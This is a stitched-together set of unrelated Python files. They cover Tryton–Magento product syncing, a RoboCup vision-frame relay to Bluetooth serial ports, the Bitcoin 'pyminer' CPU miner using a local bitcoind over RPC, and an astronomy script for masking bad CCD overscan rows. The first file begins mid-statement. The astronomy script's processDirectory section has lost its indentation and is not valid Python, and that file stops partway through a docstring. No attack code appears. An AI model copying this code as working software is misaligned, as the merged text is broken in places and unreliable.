                                    (result['faultCode'], result['faultMessage'])  # noqa
                                )
class Product:
    "Product"
    __name__ = "product.product"

    @classmethod
    def __setup__(cls):
        """
        Setup the class before adding to pool
        """
        super(Product, cls).__setup__()
        cls._error_messages.update({
            "invalid_category": 'Category "%s" must have a magento category '
                'associated',
            "invalid_product": 'Product "%s" already has a magento product '
                'associated',
            "missing_product_code": 'Product "%s" has a missing code.',
        })

    @classmethod
    def find_or_create_using_magento_data(cls, product_data):
        """
        Find or create a product template using magento data provided.
        This method looks for an existing product matched by SKU.  If found,
        it returns the product found, else creates a new one and returns
        that.  A channel listing is created too when missing.

        :param product_data: Product Data From Magento
        :returns: Browse record of product found/created
        """
        Product = Pool().get('product.product')
        Listing = Pool().get('product.product.channel_listing')
        Channel = Pool().get('sale.channel')

        channel = Channel.get_current_magento_channel()

        products = Product.search([
            ('code', '=', product_data['sku']),
        ])
        listings = Listing.search([
            ('product.code', '=', product_data['sku']),
            ('channel', '=', channel)
        ])

        if not products:
            product = Product.create_from(channel, product_data)
        else:
            product, = products

        # The product may pre-exist without a listing on this channel.
        if not listings:
            Listing.create_from(channel, product_data)

        return product

    @classmethod
    def extract_product_values_from_data(cls, product_data):
        """
        Extract product values from the magento data, used for both
        creation/updation of product. This method can be overwritten by
        custom modules to store extra info to a product

        :param: product_data
        :returns: Dictionary of values
        """
        Channel = Pool().get('sale.channel')

        channel = Channel.get_current_magento_channel()
        values = {
            # Fall back to a SKU-derived name when Magento sends none.
            'name': product_data.get('name') or
                ('SKU: ' + product_data.get('sku')),
            'default_uom': channel.default_uom.id,
            'salable': True,
            'sale_uom': channel.default_uom.id,
        }
        # Non-physical magento types map to Tryton service products.
        if product_data['type'] in ('downloadable', 'virtual'):
            values['type'] = 'service'
        return values

    @classmethod
    def create_from(cls, channel, product_data):
        """
        Create the product for the channel

        Non-magento channels are delegated to the parent implementation.
        """
        if channel.source != 'magento':
            return super(Product, cls).create_from(channel, product_data)

        return cls.create_using_magento_data(product_data)

    @classmethod
    def create_using_magento_data(cls, product_data):
        """
        Create a new product with the `product_data` from magento.This method
        also looks for the category of the product. If found, it uses that
        category to assign the product to. If no category is found, it assigns
        the product to `Unclassified Magento Product` category

        :param product_data: Product Data from Magento
        :returns: Browse record of product created
        """
        # TODO: Remove this method completely and stick to the channel API
        # The method above (create_from) should be used instead.
        Template = Pool().get('product.template')
        Category = Pool().get('product.category')

        # Get only the first category from the list of categories
        # If no category is found, put product under unclassified category
        # which is created by default data
        if product_data.get('categories'):
            category = Category.find_or_create_using_magento_id(
                int(product_data['categories'][0])
            )
        else:
            categories = Category.search([
                ('name', '=', 'Unclassified Magento Products')
            ])
            category = categories[0]

        product_template_values = cls.extract_product_values_from_data(
            product_data
        )
        # Template plus its single product variant in one nested create;
        # price fields fall back to 0.00 when absent.
        product_template_values.update({
            'products': [('create', [{
                'description': product_data.get('description'),
                'code': product_data['sku'],
                'list_price': Decimal(
                    product_data.get('special_price') or
                    product_data.get('price') or
                    0.00
                ),
                'cost_price': Decimal(product_data.get('cost') or 0.00),
            }])],
            'category': category.id,
        })
        product_template, = Template.create([product_template_values])

        return product_template.products[0]

    def update_from_magento(self):
        """
        Update product using magento ID for that product

        :returns: Active record of product updated
        """
        Channel = Pool().get('sale.channel')
        SaleChannelListing = Pool().get('product.product.channel_listing')

        channel = Channel.get_current_magento_channel()
        with magento.Product(
            channel.magento_url, channel.magento_api_user,
            channel.magento_api_key
        ) as product_api:
            # Exactly one listing is expected for this product/channel.
            channel_listing, = SaleChannelListing.search([
                ('product', '=', self.id),
                ('channel', '=', channel.id),
            ])
            product_data = product_api.info(
                channel_listing.product_identifier,
                identifierType="productID"
            )

        return self.update_from_magento_using_data(product_data)

    def update_from_magento_using_data(self, product_data):
        """
        Update product using magento data

        :param product_data: Product Data from magento
        :returns: Active record of product updated
        """
        Template = Pool().get('product.template')

        product_template_values = self.extract_product_values_from_data(
            product_data
        )
        # Write template-level values and this variant's fields together.
        product_template_values.update({
            'products': [('write', [self], {
                'description': product_data.get('description'),
                'code': product_data['sku'],
                'list_price': Decimal(
                    product_data.get('special_price') or
                    product_data.get('price') or
                    0.00
                ),
                'cost_price': Decimal(product_data.get('cost') or 0.00),
            })]
        })
        Template.write([self.template], product_template_values)

        return self

    def get_product_values_for_export_to_magento(self, categories, channels):
        """Creates a dictionary of values which have to exported to magento for
        creating a product

        :param categories: List of Browse record of categories
        :param channels: List of Browse record of channels
        """
        return {
            # Magento ids of every mapping the first category carries.
            'categories': map(
                lambda mag_categ: mag_categ.magento_id,
                categories[0].magento_ids
            ),
            'websites': map(lambda c: c.magento_website_id, channels),
            'name': self.name,
            'description': self.description or self.name,
            'short_description': self.description or self.name,
            'status': '1',
            'visibility': '4',
            'price': float(str(self.list_price)),
            'tax_class_id': '1',  # FIXME
        }
class ProductPriceTier(ModelSQL, ModelView):
    """Price Tiers for product

    This model stores the price tiers to be used while sending
    tier prices for a product from Tryton to Magento.
    """
    __name__ = 'product.price_tier'
    _rec_name = 'quantity'

    product_listing = fields.Many2One(
        'product.product.channel_listing', 'Product Listing', required=True,
        readonly=True,
    )
    # Threshold quantity at which this tier price applies.
    quantity = fields.Float(
        'Quantity', required=True
    )
    # Computed on the fly from the channel's price list (see get_price).
    price = fields.Function(fields.Numeric('Price'), 'get_price')

    @classmethod
    def __setup__(cls):
        """
        Setup the class before adding to pool
        """
        super(ProductPriceTier, cls).__setup__()
        # One tier per (listing, quantity) pair.
        cls._sql_constraints += [
            (
                'product_listing_quantity_unique',
                'UNIQUE(product_listing, quantity)',
                'Quantity in price tiers must be unique for a product listing'
            )
        ]

    def get_price(self, name):
        """Calculate the price of the product for quantity set in record

        :param name: Name of field
        """
        Channel = Pool().get('sale.channel')

        # Outside a channel context there is no price list to consult.
        if not Transaction().context.get('current_channel'):
            return 0

        channel = Channel.get_current_magento_channel()
        product = self.product_listing.product
        return channel.price_list.compute(
            None, product, product.list_price, self.quantity,
            channel.default_uom
        )
| |
# Python Imports
import threading
import Queue
import sys
import optparse
import struct
import socket
import os
# Project Imports
import messages
import proto.messages_robocup_ssl_wrapper_pb2 as ssl_wrapper
# Library Imports
import pyinotify
# Coordinate-conversion constants handed to messages.FieldInfo when
# translating incoming SSL_DetectionFrame coordinates into robot
# coordinates.  (Fixed: removed stray C-style trailing semicolons.)
X_SHIFT = 121.92        # x-axis offset; presumably a field dimension — TODO confirm units
Y_SHIFT = 121.92 / 2.0  # y-axis offset: half of X_SHIFT
SCALE = 0.1             # scale factor applied to frame coordinates
class FieldUpdateConsumer(threading.Thread):
    """
    Grabs new SSL_DetectionFrame packets off its queue and sends them for
    processing until its told to stop
    """
    # NOTE(review): all state is initialised in start() rather than
    # __init__, so running()/put() must not be called before start().

    def start(self):
        self._lock = threading.Lock()
        self._running = True

        # Infinite size FIFO queue (insertion never blocks)
        self._queue = Queue.Queue(maxsize = 0)

        # Start thread
        threading.Thread.start(self)

    def running(self):
        # Read the flag under the lock so writes from other threads are
        # observed consistently.
        running = None
        self._lock.acquire()
        running = self._running
        self._lock.release()
        return running

    def set_running(self, running):
        # Setting False asks the run() loop to exit at its next check.
        self._lock.acquire()
        self._running = running
        self._lock.release()

    def put(self,frame):
        # Never blocks: the queue is unbounded.
        self._queue.put_nowait(frame)

    def run(self):
        while self.running():
            frame = None
            try:
                # Wait on an frame (0.1s timeout keeps the stop flag
                # responsive even when no frames arrive)
                frame = self._queue.get(block = True, timeout = 0.1)

                # Empty the queue leaving us with the last (and most recent
                # frame) — stale frames are deliberately dropped
                while not self._queue.empty():
                    frame = self._queue.get_nowait()
            except Queue.Empty:
                pass

            # Now lets process this frame, only if we are still running
            if self.running():
                if frame is not None:
                    self.process_frame(frame)

    def process_frame(self, frame):
        """
        Over ride this to process frame events
        """
        pass
class DebugConsumer(FieldUpdateConsumer):
    """
    Grabs frames and prints them (printing currently commented out, so
    frames are simply discarded)
    """
    def process_frame(self, frame):
        # Re-enable the line below to dump each frame's field info.
        #print messages.FieldInfo(frame,X_SHIFT,Y_SHIFT,SCALE)
        pass
class BluetoothConsumer(FieldUpdateConsumer):
    """
    Consumes frames and writes each one out over a serial (bluetooth) port.
    """

    def start(self, devfile, testmode = False):
        """Open *devfile* (serial device, or a plain file in test mode) and
        start the consumer thread."""
        if not testmode:
            self.port = self._open_port(devfile)
        else:
            self.port = open(devfile,'w')
        FieldUpdateConsumer.start(self)

    def process_frame(self, frame):
        """Serialize *frame* and send it down the port, preceded by a
        two-byte 0xFF 0xFF sync header."""
        if self.port is not None:
            # Sync header marking the start of a packet
            self.port.write(struct.pack('BB',255,255))
            # Fixed: a stray ``self.port.write(data)`` here referenced an
            # undefined name and raised NameError on the first frame.
            field_info = messages.FieldInfo(frame,X_SHIFT,Y_SHIFT,SCALE)
            field_info.send_data(self.port)
            self.port.flush()

    def _open_port(self, devfile):
        """Open and configure the serial port at *devfile* (9600 8N1)."""
        # Fixed: was declared without ``self`` although always called as
        # ``self._open_port(devfile)``, which passed the instance as the
        # device path and dropped the real argument.
        # NOTE(review): ``serial`` (pyserial) is not imported anywhere in
        # this module — confirm the import exists in the real project.
        port = serial.Serial()
        port.setPort(devfile)
        port.setBaudrate(9600)
        port.setStopbits(1)
        port.setByteSize(8)
        port.setTimeout(500)
        port.setParity('N')
        port.open()
        return port
class ConsumerPool(object):
    """
    Thread-safe collection of consumers: fans incoming frames out to every
    member and supports stopping/joining all of them at once.
    """

    def __init__(self):
        self._lock = threading.Lock()
        self._consumers = []

    def add_consumer(self, consumer):
        """Register *consumer* with the pool."""
        with self._lock:
            self._consumers.append(consumer)

    def remove_consumer(self, consumer):
        """Drop *consumer* from the pool."""
        with self._lock:
            self._consumers.remove(consumer)

    def stop_all(self):
        """Ask every registered consumer to stop running."""
        with self._lock:
            for member in self._consumers:
                member.set_running(False)

    def join_all(self):
        """Block until every registered consumer thread has finished."""
        with self._lock:
            for member in self._consumers:
                member.join()

    def put(self, frame):
        """Hand *frame* to every registered consumer."""
        with self._lock:
            for member in self._consumers:
                member.put(frame)
class BluetoothDevWatcher(pyinotify.ProcessEvent):
    """
    Watches the device directory, and create BluetoothConsumers for new devices
    """
    def __init__(self, prefix, pool, testmode = False):
        pyinotify.ProcessEvent.__init__(self)
        self._pool = pool
        self._prefix = prefix
        # full device path -> BluetoothConsumer, for shutdown on removal
        self._blueConsumers = {}
        self._testmode = testmode

    def process_IN_CREATE(self, event):
        # A new file appeared; only react to devices matching our prefix.
        full_path = os.path.join(event.path, event.name)
        if full_path.startswith(self._prefix):
            print "Connecting to:",full_path
            # Create and store the consumer for future shutdown
            blue_con = BluetoothConsumer()
            self._blueConsumers[full_path] = blue_con

            # Start up and add to the pool
            blue_con.start(full_path, self._testmode)
            self._pool.add_consumer(blue_con)

    def process_IN_DELETE(self, event):
        """
        Tries to find the currently created consumer for this device and
        shut it down if needed
        """
        full_path = os.path.join(event.path, event.name)
        if full_path in self._blueConsumers:
            print "Removing:",full_path
            # Stop the consumer, detach it from the pool, and wait for its
            # thread to exit before forgetting it.
            blue_con = self._blueConsumers[full_path]
            blue_con.set_running(False)
            self._pool.remove_consumer(blue_con)
            blue_con.join()
def open_mcast_socket(ip_addr_str, port):
    """Create a UDP socket bound to *port* and joined to the multicast
    group *ip_addr_str*, listening on all interfaces."""
    mcast_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
                               socket.IPPROTO_UDP)
    # Allow several listeners on the same port
    mcast_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    mcast_sock.bind(('', port))
    # Join the multicast group on the default interface
    membership = struct.pack("=4sl", socket.inet_aton(ip_addr_str),
                             socket.INADDR_ANY)
    mcast_sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
                          membership)
    return mcast_sock
def main(argv=None):
    """Entry point: listen for SSL-Vision multicast packets and fan the
    detection frames out to the debug and bluetooth consumers.

    :param argv: argument vector (defaults to sys.argv)
    :returns: None (runs until KeyboardInterrupt)
    """
    if argv is None:
        argv = sys.argv

    # Parse arguments
    parser = optparse.OptionParser()
    parser.set_defaults(host="224.5.23.2", port= 10002, testmode=False,
                        devprefix='/dev/rfcomm')
    # Fixed: the option dests were "hostname"/"portnum" while the defaults
    # and the code below use options.host/options.port, so the -H and -p
    # flags were silently ignored.
    parser.add_option("-H", "--host", dest="host",
                      type="string", help="specify UDP multicast ip address")
    parser.add_option("-p", "--port", dest="port",
                      type="int", help="port number to run on")
    parser.add_option("-t", "--test", dest="testmode", action="store_true",
                      help="Enables writing to normal file")
    parser.add_option("-d","--devprefix", dest="devprefix", type="string",
                      help="The prefix for the files that are watched")
    # Fixed: honor the argv parameter instead of always reading sys.argv.
    (options, args) = parser.parse_args(argv[1:])

    # Open up the UDP multicast socket
    sock = open_mcast_socket(options.host, options.port)

    # Consumer pool fans each frame out to all consumers
    pool = ConsumerPool()

    # Create the debug consumer
    debug = DebugConsumer()
    pool.add_consumer(debug)

    # Watch the device directory so newly appearing bluetooth devices get
    # their own consumers
    mask = pyinotify.EventsCodes.IN_DELETE | pyinotify.EventsCodes.IN_CREATE
    wm = pyinotify.WatchManager()
    blueWatcher = BluetoothDevWatcher(options.devprefix, pool,
                                      testmode = options.testmode)
    notifier = pyinotify.ThreadedNotifier(wm, blueWatcher)
    watchdir, fileprefix = os.path.split(options.devprefix)
    wdd = wm.add_watch(watchdir, mask, rec=False)

    # Start the theads!!
    notifier.start()
    debug.start()

    wrapper_packet = ssl_wrapper.SSL_WrapperPacket()
    try:
        while 1:
            data, sender = sock.recvfrom(1500)
            wrapper_packet.ParseFromString(data)
            frame = wrapper_packet.detection
            pool.put(frame)
    except KeyboardInterrupt:
        # Fixed: also stop the inotify notifier thread, otherwise the
        # process would hang after Ctrl-C with the watcher still running.
        notifier.stop()
        pool.stop_all()
        pool.join_all()


if __name__ == "__main__":
    sys.exit(main())
| |
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15           # seconds to wait after an RPC error before retrying — TODO confirm against the retry loop (not visible in this chunk)
MAX_NONCE = 1000000L     # nonces scanned per work unit (Python 2 long literal)

settings = {}            # global settings dict — filled in elsewhere (not visible in this chunk)
pp = pprint.PrettyPrinter(indent=4)  # shared pretty-printer for debug output
class BitcoinRPC:
    """Minimal JSON-RPC 1.1 client for a bitcoind node (Python 2)."""
    # Starting request id; see the NOTE in rpc() about instance shadowing.
    OBJID = 1

    def __init__(self, host, port, username, password):
        # Pre-compute the HTTP Basic auth header and keep one persistent
        # connection to the node (30 second timeout, no strict mode).
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        self.conn = httplib.HTTPConnection(host, port, False, 30)

    def rpc(self, method, params=None):
        """POST one JSON-RPC call; return the result, the error object on
        RPC error, or None on transport/decoding problems."""
        # NOTE(review): += rebinds OBJID as an *instance* attribute,
        # shadowing the class attribute, so ids are per-instance from 2.
        self.OBJID += 1
        obj = { 'version' : '1.1',
            'method' : method,
            'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
            { 'Authorization' : self.authhdr,
              'Content-type' : 'application/json' })

        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None

        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        # NOTE(review): on RPC error the error object itself is returned,
        # not raised — callers must inspect the shape of the return value.
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None

        return resp_obj['result']

    def getblockcount(self):
        # Convenience wrapper for the 'getblockcount' RPC.
        return self.rpc('getblockcount')

    def getwork(self, data=None):
        # 'getwork' with no data requests work; with data submits a share.
        return self.rpc('getwork', data)
def uint32(x):
    """Truncate *x* to an unsigned 32-bit value.

    The mask is written without Python 2's ``L`` suffix so this helper is
    also valid Python 3 syntax; behaviour under Python 2 is unchanged
    (small ints promote to long automatically).
    """
    return x & 0xffffffff
def bytereverse(x):
    """Return the 32-bit value *x* with its four bytes in reversed order."""
    swapped = (((x) << 24) | (((x) << 8) & 0x00ff0000) |
               (((x) >> 8) & 0x0000ff00) | ((x) >> 24))
    # Mask back down to 32 bits (inlines the uint32 helper).
    return swapped & 0xffffffff
def bufreverse(in_buf):
    """Byte-swap each 32-bit word of *in_buf* (length must be a multiple of 4)."""
    swapped_words = []
    for offset in range(0, len(in_buf), 4):
        (word,) = struct.unpack('@I', in_buf[offset:offset + 4])
        swapped_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(swapped_words)
def wordreverse(in_buf):
    """Reverse the order of the 4-byte words in *in_buf*.

    Bytes within each word are left untouched.
    """
    words = [in_buf[pos:pos + 4] for pos in range(0, len(in_buf), 4)]
    return ''.join(reversed(words))
class Miner:
    # One mining worker: fetches work over RPC, scans a nonce range for a
    # winning double-SHA256 hash, and submits any solution found.
    # NOTE: Python 2 only (print statements, long ints, str.decode('hex'),
    # xrange).
    def __init__(self, id):
        self.id = id
        # Nonce scan window; re-targeted each pass to match 'scantime'.
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        # Scan nonces against the given work; returns (hashes_done,
        # nonce_bin) on success, (hashes_done, None) when the window is
        # exhausted without a winner.
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)
        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]
        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]  # byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)
        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)
        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)
            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()
            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()
            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue
            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)
            # proof-of-work test:  hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # return (nonce + 1, nonce_bin)
        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        # Splice the byte-reversed hex nonce into the original work string
        # (hex chars 152-159 hold the nonce field) and send it upstream.
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        # One fetch/scan/submit pass; sleeps and retries on RPC trouble.
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return
        time_start = time.time()
        (hashes_done, nonce_bin) = self.work(work['data'],
                                             work['target'])
        time_end = time.time()
        time_diff = time_end - time_start
        # Re-target max_nonce so the next scan takes about 'scantime' seconds,
        # clamped just below 2^32.
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL
        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                self.id, hashes_done,
                (hashes_done / 1000.0) / time_diff)
        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        # Run forever against one RPC connection built from global settings.
        rpc = BitcoinRPC(settings['host'], settings['port'],
                         settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return
        while True:
            self.iterate(rpc)
def miner_thread(id):
    """Worker-process entry point: run one Miner's fetch/scan/submit loop forever."""
    Miner(id).loop()
if __name__ == '__main__':
    # Script mode: read a key=value config file, apply defaults, then fork
    # one mining process per configured thread. (Python 2 prints.)
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)

    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue
        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()

    # Defaults for optional settings.
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 4567
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    # Credentials are mandatory.
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)

    # Config values arrive as strings; normalize the numeric ones.
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])

    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)			# stagger threads

    print settings['threads'], "mining threads started"
    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        # Wait for all workers; Ctrl-C drops through to the stop message.
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
| |
#!/usr/bin/env python
################
# @file maskBadOverscans.py
# @author Douglas Applegate
# @date 2/14/07 (Vday - what a lame day)
#
# @brief Checks the overscan region of an image
# for electron bleedthrough from an image obj (ie star)
# near the edge. Creates a mask with the appropriate row eliminated
################
__cvs_id__ = "$Id: maskBadOverscans.py,v 1.4 2008-07-09 01:22:15 dapple Exp $"
########################################################################
usage = \
'''
maskBadOverscans.py maindir workdir prefix [options]
ex: maskBadOverscans.py /path/to/date_filter SCIENCE SUPA
or
maskBadOverscans.py test
'''
########################################################################
import astropy, astropy.io.fits as pyfits, re, unittest, sys, os, numpy, math, glob
import bashreader, leastsq, TestBadOverscansTestData, regionfile
from optparse import OptionParser
########################################################################
import BonnLogger
########################################################################
########################################################################
# UTILITY CLASSES
#################
# Control-flow / configuration error types used throughout this script.
class NothingToDoException(Exception): pass        # no FITS files found to process
class NoInstrumentException(Exception): pass       # $INSTRUMENT not set in the environment
class BadInstrumentFileException(Exception): pass  # instrument .ini lacks overscan/cut keys
########################################################################
class OverscanInfo(dict):
    '''class OverscanInfo
    Extracts relevant info about the size & shape
    of the overscan region from a dictionary-interfaced object.

    Maps chipId -> {'min', 'max', 'offset'}; the overscan direction
    (x or y) is stored once per instrument.
    NOTE: Python 2 only (iteritems/itervalues).
    '''
    def __init__(self, config = None):
        '''@param config a dictionary-interfaced object
        config should have entries 'ovscan[x|y]',
        and 'cut[x|y]
        '''
        # None until a direction is parsed; checked by isInitialized().
        self.directionIsX = None
        if config is not None:
            self.readConfig(config)
    ###
    def __str__(self):
        # Human-readable dump for debugging.
        astr = "OverscanInfo:\n"
        if self.isXDirection():
            astr += "\tDirection: X\n"
        else:
            astr += "\tDirection: Y\n"
        for chip, chipData in self.iteritems():
            astr += "\tChip %d: %s\n" % (chip, chipData)
        return astr
    ###
    def setXOverscanDir(self):
        self.directionIsX = True
    def setYOverscanDir(self):
        self.directionIsX = False
    def isYDirection(self):
        return not self.directionIsX
    def isXDirection(self):
        return self.directionIsX
    ###
    def isInitialized(self):
        # True only when a direction is set and every chip entry is complete.
        if self.directionIsX == None:
            return False
        for chip in self.itervalues():
            for entry in chip.iteritems():
                if entry is None:
                    return False
        return True
    ###
    def addChip(self, chipId):
        # Idempotent: existing chip entries are left untouched.
        if chipId not in self:
            self[chipId] = {'min':None,
                            'max':None,
                            'offset':None}
    ###
    def setMin(self, chipId, min):
        self[chipId]['min'] = min
    def getMin(self, chipId):
        return self[chipId]['min']
    def setMax(self, chipId, max):
        # Stored max is exclusive: one past the given last column/row.
        self[chipId]['max'] = max+1
    def getMax(self, chipId):
        return self[chipId]['max']
    ###
    def setOffset(self, chipId, offset):
        self[chipId]['offset'] = offset
    def getOffset(self, chipId):
        return self[chipId]['offset']
    ###
    def _parseOverscan(self, config):
        # Scan config keys of the form ovscan[x|y][1|2]; '1' keys give the
        # region start, '2' keys the region end, and the letter fixes the
        # overscan direction.
        def parseDirection(direction):
            if direction == 'x':
                self.setXOverscanDir()
            else:
                self.setYOverscanDir()
        ###
        def parseMinOrMax(index):
            if index == '1':
                return self.setMin
            else:
                return self.setMax
        ###
        parameterNames = config.keys()
        for param in parameterNames:
            match = re.match('ovscan([xy])(\d+)', param)
            if match is None:
                continue
            parseDirection(match.group(1))
            addPixVal = parseMinOrMax(match.group(2))
            overscanBoundaries = getattr(config, param).iteritems()
            for chipId, pixIndex in overscanBoundaries:
                self.addChip(chipId)
                # config indices are 1-based; store 0-based.
                addPixVal(chipId, pixIndex - 1)
    ###
    def _parseOffset(self, config):
        # The offset comes from the cut in the perpendicular direction.
        if self.isXDirection():
            paramName = 'cuty'
        else:
            paramName = 'cutx'
        offsets = getattr(config, paramName).iteritems()
        for chip, offset in offsets:
            self.setOffset(chip, offset)
    ###
    def readConfig(self, config):
        '''@param config a dictionary-interfaced object
        config should have entries 'ovscan[x|y]',
        and 'cut[x|y]
        '''
        self._parseOverscan(config)
        self._parseOffset(config)
        if not self.isInitialized():
            raise BadInstrumentFileException
######################################################################
######################################################################
##############################
#USER METHODS
#############
def maskOverscanLines(image, overscanInfo, chipId,
                      buffer = 1,
                      threshold = 3.,
                      bumpWidth = 2):
    '''
    @brief Given an image, return polygons of areas to exclude due to a bad
        overscan correction
    @param image a 2d numpy array. First index is y dimension
    @param overscanInfo an OverscanInfo object
    @param chipId id key in overscanInfo corresponding to image
    @param buffer number of rows around a detected overscan anomaly region
        to also exclude
    @param threshold detection threshold of overscan anomalies
    @param bumpWidth required width of anomaly (in pixels) for detection
    @returns a set of regionfile.Polygon objects
    '''
    # Pull out the overscan strip, clean per-line outliers, then locate
    # and merge anomalous row ranges.
    strip = extractOverscan(image, overscanInfo, chipId)
    cleaned = rejectOutliersByLine(strip)
    anomalies = findExclusions(cleaned, threshold = threshold,
                               bumpWidth = bumpWidth)
    bumps = mergeBumps(anomalies)
    offset = overscanInfo.getOffset(chipId)
    # Box orientation follows the overscan direction.
    if overscanInfo.isXDirection():
        return makePolygons(imageWidth = image.shape[1],
                            imageOffset = offset,
                            ranges = bumps,
                            buffer = buffer)
    return makePolygons(imageWidth = image.shape[0],
                        imageOffset = offset,
                        ranges = bumps,
                        buffer = buffer,
                        vertical = True)
######################################################################
def processDirectory(maindir, dir, prefix = '', buffer = 4,
threshold = 3., bumpWidth = 2):
'''
@brief Given a directory, process all images in directory for masking
@param maindir date_filter directory name
@param dir subdirectory to examine, eg, SCIENCE
@param prefix process only files starting with given prefix phrase
@param buffer number of rows around a detected overscan anomoly region
to also exclude
@param threshold detection threshold of overscan anomolies
@param bumpWidth required width of anomoly (in pixels) for detection
@effects Appends region files in the maindir/dir/reg directory with
masking info
NOTE: Assumes Bonn pipeline structures
'''
dirPath = '%s/%s' % (maindir, dir)
###
def getOverscanInfo():
if 'INSTRUMENT' not in os.environ:
raise NoInstrumentException
instrumentFile = '%s.ini' % os.environ['INSTRUMENT']
return OverscanInfo(bashreader.parseFile(instrumentFile))
###
def makeRegiondir():
regiondir = '%s/reg' % dirPath
if not os.path.exists(regiondir):
os.mkdir(regiondir)
return regiondir
###
def getImageFiles():
if os.path.exists('%s/SPLIT_IMAGES' % dirPath):
filenames = glob.glob('%s/SPLIT_IMAGES/*.fits' % dirPath)
else:
filenames = glob.glob('%s/*.fits' % dirPath)
if len(filenames) == 0:
raise NothingToDoException
return filenames
###
def getImage(filename):
fitsFile = pyfits.open(fullFilename)
image = fitsFile[0].data
fitsFile.close()
return image
###
overscanInfo = getOverscanInfo()
regiondir = makeRegiondir()
filenames = getImageFiles()
for fullFilename in filenames:
filename = os.path.basename(fullFilename)
print 'Processing %s...' % filename
match = re.match('(%s\d+_(\d+))\.fits' % prefix, filename)
if match is None:
print '! Skipping %s' % filename
continue
basename = match.group(1)
chipId = int(match.group(2))
image = getImage(filename)
maskedRegions = maskOverscanLines(image, overscanInfo, chipId,
buffer = buffer,
threshold = threshold,
bumpWidth = bumpWidth)
regionFilename = '%s/%s.reg' % (regiondir, basename)
regionfile.writeRegionFile(regionFilename, maskedRegions)
##########################################################################
##########################################################################
##################################
#UTILITY METHODS
################
def extractOverscan(image, overscanInfo, chipId):
    """Return the overscan strip of *image* for chip *chipId*.

    For a y-direction overscan the image is transposed first, because the
    default FITS layout puts y on the first axis; columns [min, max) are
    then sliced out.
    """
    if overscanInfo.isYDirection():
        data = image.transpose()
    else:
        data = image
    lo = overscanInfo.getMin(chipId)
    hi = overscanInfo.getMax(chipId)
    return data[:, lo:hi]
############################################################################
def rejectOutliersByLine(image):
    """For each row, drop the single lowest and single highest pixel.

    @param image 2d numpy array
    @returns a new float array with shape (rows, cols - 2)

